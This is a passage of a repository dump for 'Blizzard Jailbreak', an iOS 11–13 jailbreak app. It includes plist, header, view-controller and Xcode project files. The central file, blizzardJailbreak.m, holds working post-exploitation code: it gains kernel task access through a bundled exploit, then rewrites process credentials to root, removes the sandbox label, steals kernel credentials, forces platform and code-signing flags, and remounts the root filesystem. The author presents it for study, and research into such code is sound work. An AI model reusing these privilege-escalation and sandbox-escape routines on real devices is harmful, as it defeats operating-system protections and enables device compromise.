<string>$(DEVELOPMENT_LANGUAGE)</string>
<key>CFBundleDisplayName</key>
<string>BLIZZARD</string>
<key>CFBundleExecutable</key>
<string>$(EXECUTABLE_NAME)</string>
<key>CFBundleIdentifier</key>
<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>$(PRODUCT_NAME)</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleVersion</key>
<string>1</string>
<key>LSRequiresIPhoneOS</key>
<true/>
<key>UILaunchStoryboardName</key>
<string>LaunchScreen</string>
<key>UIMainStoryboardFile</key>
<string>Main</string>
<key>UIRequiredDeviceCapabilities</key>
<array>
<string>armv7</string>
</array>
<key>UIRequiresFullScreen</key>
<true/>
<key>UIStatusBarStyle</key>
<string>UIStatusBarStyleLightContent</string>
<key>UISupportedInterfaceOrientations</key>
<array>
<string>UIInterfaceOrientationPortrait</string>
</array>
<key>UISupportedInterfaceOrientations~ipad</key>
<array>
<string>UIInterfaceOrientationPortrait</string>
<string>UIInterfaceOrientationPortraitUpsideDown</string>
<string>UIInterfaceOrientationLandscapeLeft</string>
<string>UIInterfaceOrientationLandscapeRight</string>
</array>
<key>UIViewControllerBasedStatusBarAppearance</key>
<false/>
</dict>
</plist>
================================================
FILE: Blizzard Jailbreak/blizzardJailbreak.h
================================================
//
// blizzardJailbreak.h
//
// Created by GeoSn0w on 8/10/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
#ifndef blizzardJailbreak_h
#define blizzardJailbreak_h
#include <stdio.h>
extern mach_port_t tfp0;
void remountFirstStepSys(void);
int ios11_exploit_init(void);
int rootifyOurselves(void);
int rootifyProcessByPid(void);
int restoreProcessCredentials(uint64_t creds, pid_t pid);
int obtainAPFSSnapshotsList(void);
int remountFileSystem(void);
int setcsflags(pid_t pid);
int prepareKernelForPatchFinder(void);
int cleanupAfterBlizzard(void);
int installBootStrap(void);
uint64_t findOurOwnProcess(void);
uint64_t escapeSandboxForProcess(pid_t proc_pid);
uint64_t copyPIDCredentials(pid_t processToBeGivenCreds, pid_t donorProcess);
#endif /* blizzardJailbreak_h */
================================================
FILE: Blizzard Jailbreak/blizzardJailbreak.m
================================================
//
// blizzardJailbreak.c
//
// Created by GeoSn0w on 8/10/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
#import <Foundation/Foundation.h>
#include "blizzardJailbreak.h"
#include "../Exploits/sock_port/exploit.h"
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <netinet/in.h>
#include <mach/mach.h>
#include <sys/mman.h>
#include <spawn.h>
#include "../Exploits/sock_port/kernel_memory.h"
#include "../Exploits/sock_port/offsetof.h"
#include "../Exploits/sock_port/offsets.h"
#include "../PatchFinder/patchfinder64.h"
#include "../Kernel Utilities/kernel_utils.h"
#include "../Kernel Utilities/kexecute.h"
#include "BlizzardLog.h"
#include "../APFS Utilities/rootfs_remount.h"
#include "../APFS Utilities/snapshot_tools.h"
#include "../Kernel Utilities/kernSymbolication.h"
#include "../AMFI Utilities/amfi_utils.h"
#define BlizzardJailbreakPath(obj) strdup([[[[NSBundle mainBundle] bundlePath] stringByAppendingPathComponent:@obj] UTF8String])
int APFS_SNAPSHOT_EXISTS = 1;
mach_port_t tfp0 = 0;
uint64_t KernelBase;
uint64_t defaultCredentials;
uint64_t ourProc;
void platformize(pid_t pid) {
if (!pid) return;
uint64_t proc = proc_of_pid(pid);
uint64_t task = rk64(proc + off_task);
uint32_t t_flags = rk32(task + off_t_flags);
t_flags |= 0x400; // add TF_PLATFORM flag, = 0x400
wk32(task+off_t_flags, t_flags);
uint32_t csflags = rk32(proc + off_p_csflags);
wk32(proc + off_p_csflags, csflags | 0x24004001u); //patch csflags
}
int ios11_exploit_init(){
printf("Blizzard Jailbreak\nby GeoSn0w (@FCE365)\n\nAn Open-Source Jailbreak for you to study and dissect :-)\n\n");
tfp0 = get_tfp0();
if (MACH_PORT_VALID(tfp0)){
printf("Successfully got tfp0!\n");
init_kernel_utils(tfp0);
KernelBase = grabKernelBase();
if (!KernelBase) {
printf("ERROR: Failed to find kernel base\n");
return 2;
}
kernel_slide = (uint32_t)(KernelBase - 0xFFFFFFF007004000);
int ret = prepareKernelForPatchFinder(); // patchfinder
if (ret != 0) {
printf("Failed to initialize patchfinder\n");
return 3;
}
printf("Initialized patchfinder\n");
ourProc = findOurOwnProcess();
rootifyOurselves();
defaultCredentials = escapeSandboxForProcess(getpid());
initializeKernelExecute();
uint64_t kern_proc = proc_of_pid(0);
printf("Kernel Proc is: 0x%llx\n", kern_proc);
setcsflags(getpid()); // set some csflags
platformize(getpid()); // set TF_PLATFORM
return 0;
} else {
printf("ERROR: Could not get tfp0!\n");
return -1;
}
}
int cleanupAfterBlizzard(){
restoreProcessCredentials(defaultCredentials, getpid()); // Give back our process' credentials, otherwise the device will act weird.
terminateKernelExecute(); // Always clean up after your jailbreak components. Helps stability a lot.
terminatePatchFinder();
return 0;
}
int rootifyOurselves(){
printf("Preparing to elevate own privileges to ROOT!\n");
printf(" Current UID: %d\n", getuid());
printf(" Current EUID: %d\n", geteuid());
uint64_t proc = proc_of_pid(getpid()); // Get our PID's PROC structure.
uint64_t ucred = rk64(proc + off_p_ucred); //Get our credentials.
wk32(proc + off_p_uid, 0);
wk32(proc + off_p_ruid, 0);
wk32(proc + off_p_gid, 0);
wk32(proc + off_p_rgid, 0);
wk32(ucred + off_ucred_cr_uid, 0);
wk32(ucred + off_ucred_cr_ruid, 0);
wk32(ucred + off_ucred_cr_svuid, 0);
wk32(ucred + off_ucred_cr_ngroups, 1);
wk32(ucred + off_ucred_cr_groups, 0);
wk32(ucred + off_ucred_cr_rgid, 0);
wk32(ucred + off_ucred_cr_svgid, 0);
printf(" New UID: %d\n", getuid());
printf(" New EUID: %d\n", geteuid());
if (getuid() != 501 && geteuid() != 501){
printf("Successfully got ROOT!\n");
} else {
printf("ERROR: Failed to get ROOT!\n");
return -1;
}
return 0;
}
int restoreProcessCredentials(uint64_t creds, pid_t pid){
uint64_t proc = proc_of_pid(pid);
uint64_t ucred = rk64(proc + off_p_ucred);
uint64_t cr_label = rk64(ucred + off_ucred_cr_label);
wk64(cr_label + off_sandbox_slot, creds);
if (rk64(rk64(ucred + off_ucred_cr_label) + off_sandbox_slot) != 0){
printf("Successfully restored the Sandbox!\n");
return 0;
} else {
printf("ERROR: Failed to restore the Sandbox!\n");
return -1;
}
}
uint64_t escapeSandboxForProcess(pid_t proc_pid) {
printf("Preparing to escape the sandbox...\n");
uint64_t target_process;
uint64_t ucred;
uint64_t sb_cr_label;
uint64_t default_creds;
if (proc_pid == 0) {
printf("ERROR: Will NOT mess with Kernel's PID...\n");
return -2;
}
target_process = proc_of_pid(proc_pid);
ucred = rk64(target_process + off_p_ucred);
sb_cr_label = rk64(ucred + off_ucred_cr_label);
default_creds = rk64(sb_cr_label + off_sandbox_slot);
wk64(sb_cr_label + off_sandbox_slot, 0);
/*
As far as I am aware, the first slot is used by AMFI. Sandbox should be the second.
Read Jonathan Levin's book on the Sandbox chaper for more details about the credentials.
*/
if (rk64(rk64(ucred + off_ucred_cr_label) + off_sandbox_slot) == 0){
printf("Successfully escaped the Sandbox!\n");
return default_creds;
} else {
printf("ERROR: Failed to escape the Sandbox!\n");
return -1;
}
}
int rootifyProcessByPid(){
return 0;
}
uint64_t findOurOwnProcess(){
static uint64_t self = 0;
if (!self) {
self = rk64(current_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));
printf("Found Ourselves at 0x%llx\n", self);
} else {
printf("ERROR: Cannot find our own process!\n");
}
return self;
}
uint64_t copyPIDCredentials(pid_t processToBeGivenCreds, pid_t donorProcess){
printf("CredentialsCopier: Giving process %d process %d's credentials...\n", processToBeGivenCreds, donorProcess);
uint64_t procFromPID = proc_of_pid(processToBeGivenCreds);
uint64_t donorproc = proc_of_pid(donorProcess);
uint64_t processCredentials = rk64(procFromPID + off_p_ucred);
uint64_t donorcred = rk64(donorproc + off_p_ucred);
if (procFromPID != 0 || donorcred != 0){
wk64(procFromPID + off_p_ucred, donorcred);
printf("CredentialsCopier: Successfully granted credentials from process!\n");
return processCredentials;
} else {
printf("CredentialsCopier: Failed to copy credentials from process!\n");
return -1;
}
}
int remountFileSystem(){
int returnValue = remountRootFS();
if (returnValue == 0) {
printf("ROOT FS REMOUNT: Successfully remounted!\n");
return 0;
} else {
printf("ROOT FS REMOUNT: Failed to Remount!\n");
return -1;
}
}
int setcsflags(pid_t pid) {
if (!pid) return NO;
uint64_t proc = proc_of_pid(pid);
uint32_t csflags = rk32(proc + off_p_csflags);
uint32_t newflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW | CS_DEBUGGED) & ~(CS_RESTRICT | CS_HARD | CS_KILL);
wk32(proc + off_p_csflags, newflags);
if (rk32(proc + off_p_csflags) == newflags){
printf("Successfully set CodeSign Flags!\n");
return 0;
} else {
printf("Failed to set CodeSign Flags!\n");
return -1;
}
}
int spawnBinaryAtPath(char *binary, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env) {
pid_t pd;
const char* args[] = {binary, arg1, arg2, arg3, arg4, arg5, arg6, NULL};
int rv = posix_spawn(&pd, binary, NULL, NULL, (char **)&args, env);
if (rv) return rv;
return 0;
}
int prepareKernelForPatchFinder(){
NSString *kernelNewLocation;
NSError *error;
NSFileManager *fileManager = [NSFileManager defaultManager];
NSDateFormatter *dateTimeFormat = [[NSDateFormatter alloc] init];
[dateTimeFormat setDateFormat:@"dd.MM.YY:HH.mm.ss"];
NSString *PathToDocuments = [[[fileManager URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask] lastObject] path];
mkdir(strdup([PathToDocuments UTF8String]), 0777);
kernelNewLocation = [PathToDocuments stringByAppendingPathComponent:[NSString stringWithFormat:@"%@_kernelcache", [dateTimeFormat stringFromDate:[NSDate date]]]];
printf("Kernel Decompression: Copying Kernel to %s\n", [kernelNewLocation UTF8String]);
[fileManager copyItemAtPath:@"/System/Library/Caches/com.apple.kernelcaches/kernelcache" toPath:kernelNewLocation error:&error];
if (error) {
printf("Kernel Decompression: Failed to copy the kernelcache with the following error: %s\n", [[error localizedDescription] UTF8String]);
return 4;
}
if (decompressKernelCache(strdup([kernelNewLocation UTF8String]))) {
printf("Kernel Decompression: Error initializing KernelSymbolFinder\n");
return 4;
}
initializePatchFinderWithBase(0, (char *)[[kernelNewLocation stringByAppendingString:@".dec"] UTF8String]);
return 0;
}
int installBootStrap(){
int retval;
printf("Blizzard BOOTSTRAP: Preparing to Bootstrap!\n");
printf("Blizzard BOOTSTRAP: Creating a pre-jailbreak Snapshot! This will be useful in case we wanna un-jailbreak.\n");
int checkSnap = verifySnapshot("/", "Calm-Before-The-Storm");
if (checkSnap != APFS_SNAPSHOT_EXISTS){
printf("Blizzard BOOTSTRAP: Temporarily setting kernel credentials\n");
uint64_t creds = copyPIDCredentials(getpid(), 0);
if (createNewAPFSSnapshot("/", "Calm-Before-The-Storm") == 0){
list_snapshots("/");
printf("Blizzard BOOTSTRAP: Successfully created the stock snapshot!\n");
retval = 0;
} else {
printf("Blizzard BOOTSTRAP: FAILED to create the stock snapshot!\n");
retval = -1;
}
uint64_t proc_smp = proc_of_pid(getpid());
wk64(proc_smp + off_p_ucred, creds);
return retval;
} else {
printf("Blizzard BOOTSTRAP: Safety Snapshot already exists! Will not make another one :-)\n");
return 0;
}
}
================================================
FILE: Blizzard Jailbreak/blizzardView.h
================================================
//
// blizzardView.h
// Blizzard Jailbreak
//
// Created by GeoSn0w on 8/10/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
#import <UIKit/UIKit.h>
NS_ASSUME_NONNULL_BEGIN
UIBarButtonItem* dismissKeyboardButton;
@interface blizzardView : UIViewController
@property (weak, nonatomic) IBOutlet UIButton *blizzardInit;
@property (weak, nonatomic) IBOutlet UITextField *nonceField;
@end
NS_ASSUME_NONNULL_END
================================================
FILE: Blizzard Jailbreak/blizzardView.m
================================================
//
// blizzardView.m
// Blizzard Jailbreak
//
// Created by GeoSn0w on 8/10/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
#import "blizzardView.h"
#include "blizzardJailbreak.h"
#define iosVersionSupport(v) ([[[UIDevice currentDevice] systemVersion] compare:@v options:NSNumericSearch] != NSOrderedDescending)
@interface blizzardView () <UITextFieldDelegate>
@end
@implementation blizzardView
- (void)viewDidLoad {
[super viewDidLoad];
self.nonceField.delegate = self;
printf("Blizzard Jailbreak\nby GeoSn0w (@FCE365)\n\nAn Open-Source Jailbreak for you to study and dissect :-)\n");
}
- (IBAction)blizzardInit:(id)sender {
if (iosVersionSupport("13.7")){
_blizzardInit.enabled = NO;
[_blizzardInit setTitle:@"JAILBREAKING..." forState:UIControlStateDisabled];
dispatch_async(dispatch_get_global_queue(0, 0), ^{
dispatch_async(dispatch_get_main_queue(), ^{
[self performSegueWithIdentifier:@"vc" sender:self];
});
});
} else if (iosVersionSupport("14.0")){
printf("The iOS version is not supported");
exit(0);
}
}
- (IBAction)injectSettingsUI:(id)sender {
[self performSegueWithIdentifier:@"settingsView" sender:self];
}
- (IBAction)saveJailbreakSettings:(id)sender {
[self dismissViewControllerAnimated:YES completion:nil];
}
- (BOOL)textFieldShouldReturn:(UITextField *)textField {
[textField resignFirstResponder];
return YES;
}
@end
================================================
FILE: Blizzard Jailbreak/main.m
================================================
//
// main.m
// sock_port
//
// Created by Jake James on 7/17/19.
// Copyright © 2019 Jake James. All rights reserved.
//
#import <UIKit/UIKit.h>
#import "AppDelegate.h"
int main(int argc, char * argv[]) {
@autoreleasepool {
return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
}
}
================================================
FILE: Blizzard Jailbreak.xcodeproj/project.pbxproj
================================================
// !$*UTF8*$!
{
archiveVersion = 1;
classes = {
};
objectVersion = 48;
objects = {
/* Begin PBXBuildFile section */
8288501222E07303005D10FC /* kernel_memory.c in Sources */ = {isa = PBXBuildFile; fileRef = 8288501022E07303005D10FC /* kernel_memory.c */; };
8288501522E07C15005D10FC /* offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 8288501322E07C14005D10FC /* offsets.m */; };
82E9B71522E24BAD0016AA39 /* iosurface.c in Sources */ = {isa = PBXBuildFile; fileRef = 82E9B71422E24BAD0016AA39 /* iosurface.c */; };
82F179F122DF4ED700231F8C /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F179F022DF4ED700231F8C /* AppDelegate.m */; };
82F179F722DF4ED700231F8C /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 82F179F522DF4ED700231F8C /* Main.storyboard */; };
82F179F922DF4ED700231F8C /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 82F179F822DF4ED700231F8C /* Assets.xcassets */; };
82F179FC22DF4ED700231F8C /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 82F179FA22DF4ED700231F8C /* LaunchScreen.storyboard */; };
82F179FF22DF4ED700231F8C /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F179FE22DF4ED700231F8C /* main.m */; };
82F17A0922DF4ED800231F8C /* socket_freeTests.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A0822DF4ED800231F8C /* socket_freeTests.m */; };
82F17A1422DF4ED800231F8C /* socket_freeUITests.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A1322DF4ED800231F8C /* socket_freeUITests.m */; };
82F17A2322DF4EF100231F8C /* exploit.c in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A2122DF4EF100231F8C /* exploit.c */; };
82F17A2622DF4F1C00231F8C /* exploit_utilities.c in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A2422DF4F1C00231F8C /* exploit_utilities.c */; };
D613B71B24E217D90069CA9B /* BlizzardLog.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B71A24E217D90069CA9B /* BlizzardLog.m */; };
D613B72724E2A76A0069CA9B /* rootfs_remount.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B72424E2A76A0069CA9B /* rootfs_remount.m */; };
D613B72824E2A76A0069CA9B /* offsetfinder.cpp in Sources */ = {isa = PBXBuildFile; fileRef = D613B72624E2A76A0069CA9B /* offsetfinder.cpp */; };
D613B73524E2A8AB0069CA9B /* snapshot_tools.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B73424E2A8AB0069CA9B /* snapshot_tools.c */; };
D613B74524E2B1C20069CA9B /* liboffsetfinder64.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73B24E2B1530069CA9B /* liboffsetfinder64.a */; };
D613B74624E2B1E70069CA9B /* libimg4tool.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73F24E2B1540069CA9B /* libimg4tool.a */; };
D613B74724E2B1E70069CA9B /* libmerged.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73E24E2B1530069CA9B /* libmerged.a */; };
D613B74824E2B1E70069CA9B /* libplist.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73C24E2B1530069CA9B /* libplist.a */; };
D613B74924E2B1E70069CA9B /* libplist++.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73D24E2B1530069CA9B /* libplist++.a */; };
D613B74B24E2B2560069CA9B /* libcompression.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B74A24E2B2560069CA9B /* libcompression.tbd */; };
D613B74D24E2B2600069CA9B /* libMobileGestalt.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B74C24E2B25F0069CA9B /* libMobileGestalt.tbd */; };
D613B75024E2CD5E0069CA9B /* BlizzardSpawnerTools.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B74E24E2CD5E0069CA9B /* BlizzardSpawnerTools.c */; };
D613B75724E2E8300069CA9B /* amfi_utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75324E2E8300069CA9B /* amfi_utils.m */; };
D613B75824E2E8300069CA9B /* amfid_tools.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75424E2E8300069CA9B /* amfid_tools.m */; };
D613B75924E2E8300069CA9B /* amfid_mem.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75624E2E8300069CA9B /* amfid_mem.m */; };
D613B75C24E2E8590069CA9B /* amfid.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75B24E2E8580069CA9B /* amfid.m */; };
D613B76024E2EEFD0069CA9B /* osobject.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B75E24E2EEFD0069CA9B /* osobject.c */; };
D613B76624E2F2D30069CA9B /* kernSymbolication.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B76424E2F2D30069CA9B /* kernSymbolication.c */; };
D613B78224E2F9980069CA9B /* lzssdec.cpp in Sources */ = {isa = PBXBuildFile; fileRef = D613B78024E2F9980069CA9B /* lzssdec.cpp */; };
D62BC51E24E4113200EC63D4 /* tar in Resources */ = {isa = PBXBuildFile; fileRef = D62BC51D24E4113200EC63D4 /* tar */; };
D62BC52024E41AF500EC63D4 /* basebins.tar in Resources */ = {isa = PBXBuildFile; fileRef = D62BC51F24E41AF500EC63D4 /* basebins.tar */; };
D62BC52224E41F2500EC63D4 /* dropbear.tar in Resources */ = {isa = PBXBuildFile; fileRef = D62BC52124E41F2500EC63D4 /* dropbear.tar */; };
D62CA1E524E1C7EA002E6756 /* patchfinder64.m in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1E424E1C7EA002E6756 /* patchfinder64.m */; };
D62CA1E824E1C7F7002E6756 /* kexecute.c in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1E624E1C7F7002E6756 /* kexecute.c */; };
D62CA1EB24E1C7FF002E6756 /* kernel_utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1EA24E1C7FF002E6756 /* kernel_utils.m */; };
D62CA1EE24E1C83F002E6756 /* offsetof.c in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1EC24E1C83E002E6756 /* offsetof.c */; };
D63EDAC124E1989F009B305D /* blizzardJailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = D63EDABF24E1989F009B305D /* blizzardJailbreak.m */; };
D69C4C9925686628001DE2BC /* IOKit.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = D69C4C9825686627001DE2BC /* IOKit.tbd */; };
D69C4CAE25686895001DE2BC /* ios13_userspace_pac.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA425686894001DE2BC /* ios13_userspace_pac.c */; };
D69C4CAF25686895001DE2BC /* ios13_kernel_universal.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA525686894001DE2BC /* ios13_kernel_universal.c */; };
D69C4CB025686895001DE2BC /* ios13_userspace.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA625686894001DE2BC /* ios13_userspace.c */; };
D69C4CB125686895001DE2BC /* ios13_change_offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA725686894001DE2BC /* ios13_change_offsets.m */; };
D69C4CB225686895001DE2BC /* libsnappy.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CAA25686895001DE2BC /* libsnappy.c */; };
D69C4CB325686895001DE2BC /* ios_7st_utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CAB25686895001DE2BC /* ios_7st_utils.m */; };
D6FFA56224E1A59A00CAC2E2 /* blizzardView.m in Sources */ = {isa = PBXBuildFile; fileRef = D6FFA56124E1A59A00CAC2E2 /* blizzardView.m */; };
/* End PBXBuildFile section */
/* Begin PBXContainerItemProxy section */
82F17A0522DF4ED800231F8C /* PBXContainerItemProxy */ = {
isa = PBXContainerItemProxy;
containerPortal = 82F179E422DF4ED700231F8C /* Project object */;
proxyType = 1;
remoteGlobalIDString = 82F179EB22DF4ED700231F8C;
remoteInfo = socket_free;
};
82F17A1022DF4ED800231F8C /* PBXContainerItemProxy */ = {
isa = PBXContainerItemProxy;
containerPortal = 82F179E422DF4ED700231F8C /* Project object */;
proxyType = 1;
remoteGlobalIDString = 82F179EB22DF4ED700231F8C;
remoteInfo = socket_free;
};
/* End PBXContainerItemProxy section */
/* Begin PBXFileReference section */
8288501022E07303005D10FC /* kernel_memory.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kernel_memory.c; sourceTree = "<group>"; };
8288501122E07303005D10FC /* kernel_memory.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kernel_memory.h; sourceTree = "<group>"; };
8288501322E07C14005D10FC /* offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = offsets.m; sourceTree = "<group>"; };
8288501422E07C14005D10FC /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = "<group>"; };
82E9B71322E24BAC0016AA39 /* iosurface.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = iosurface.h; sourceTree = "<group>"; };
82E9B71422E24BAD0016AA39 /* iosurface.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = iosurface.c; sourceTree = "<group>"; };
82F179EC22DF4ED700231F8C /* Blizzard Jailbreak.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = "Blizzard Jailbreak.app"; sourceTree = BUILT_PRODUCTS_DIR; };
82F179EF22DF4ED700231F8C /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = "<group>"; };
82F179F022DF4ED700231F8C /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = "<group>"; };
82F179F622DF4ED700231F8C /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = "<group>"; };
82F179F822DF4ED700231F8C /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = "<group>"; };
82F179FB22DF4ED700231F8C /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = "<group>"; };
82F179FD22DF4ED700231F8C /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
82F179FE22DF4ED700231F8C /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = "<group>"; };
82F17A0422DF4ED800231F8C /* Blizzard JailbreakTests.xctest */ = {isa = PBXFileReference; explicitFileType = wrapper.cfbundle; includeInIndex = 0; path = "Blizzard JailbreakTests.xctest"; sourceTree = BUILT_PRODUCTS_DIR; };
82F17A0822DF4ED800231F8C /* socket_freeTests.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = socket_freeTests.m; sourceTree = "<group>"; };
82F17A0A22DF4ED800231F8C /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
82F17A0F22DF4ED800231F8C /* Blizzard JailbreakUITests.xctest */ = {isa = PBXFileReference; explicitFileType = wrapper.cfbundle; includeInIndex = 0; path = "Blizzard JailbreakUITests.xctest"; sourceTree = BUILT_PRODUCTS_DIR; };
82F17A1322DF4ED800231F8C /* socket_freeUITests.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = socket_freeUITests.m; sourceTree = "<group>"; };
82F17A1522DF4ED800231F8C /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
82F17A2122DF4EF100231F8C /* exploit.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = exploit.c; sourceTree = "<group>"; };
82F17A2222DF4EF100231F8C /* exploit.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = exploit.h; sourceTree = "<group>"; };
82F17A2422DF4F1C00231F8C /* exploit_utilities.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = exploit_utilities.c; sourceTree = "<group>"; };
82F17A2522DF4F1C00231F8C /* exploit_utilities.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = exploit_utilities.h; sourceTree = "<group>"; };
82F17A2822DF57B700231F8C /* IOKit.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = IOKit.tbd; path = socket_free/IOKit.tbd; sourceTree = "<group>"; };
D613B71924E217D90069CA9B /* BlizzardLog.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = BlizzardLog.h; sourceTree = "<group>"; };
D613B71A24E217D90069CA9B /* BlizzardLog.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = BlizzardLog.m; sourceTree = "<group>"; };
D613B72424E2A76A0069CA9B /* rootfs_remount.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = rootfs_remount.m; sourceTree = "<group>"; };
D613B72524E2A76A0069CA9B /* rootfs_remount.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = rootfs_remount.h; sourceTree = "<group>"; };
D613B72624E2A76A0069CA9B /* offsetfinder.cpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; path = offsetfinder.cpp; sourceTree = "<group>"; };
D613B72924E2A79F0069CA9B /* liboffsetfinder64.hpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.h; path = liboffsetfinder64.hpp; sourceTree = "<group>"; };
D613B72A24E2A7B70069CA9B /* liboffsetfinder64.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = liboffsetfinder64.a; path = "../electra1131-master/electra1131/libs/liboffsetfinder64.a"; sourceTree = "<group>"; };
D613B72B24E2A7B70069CA9B /* libplist.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libplist.a; path = "../electra1131-master/electra1131/libs/libplist.a"; sourceTree = "<group>"; };
D613B72C24E2A7B70069CA9B /* libplist++.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = "libplist++.a"; path = "../electra1131-master/electra1131/libs/libplist++.a"; sourceTree = "<group>"; };
D613B72D24E2A7B70069CA9B /* libmerged.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libmerged.a; path = "../electra1131-master/electra1131/libs/libmerged.a"; sourceTree = "<group>"; };
D613B72E24E2A7B70069CA9B /* libimg4tool.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libimg4tool.a; path = "../electra1131-master/electra1131/libs/libimg4tool.a"; sourceTree = "<group>"; };
D613B73424E2A8AB0069CA9B /* snapshot_tools.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = snapshot_tools.c; sourceTree = "<group>"; };
D613B73624E2A8B00069CA9B /* snapshot_tools.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = snapshot_tools.h; sourceTree = "<group>"; };
D613B73724E2A8C40069CA9B /* IOKit.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = IOKit.h; sourceTree = "<group>"; };
D613B73824E2A99B0069CA9B /* system_reboot.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = system_reboot.h; sourceTree = "<group>"; };
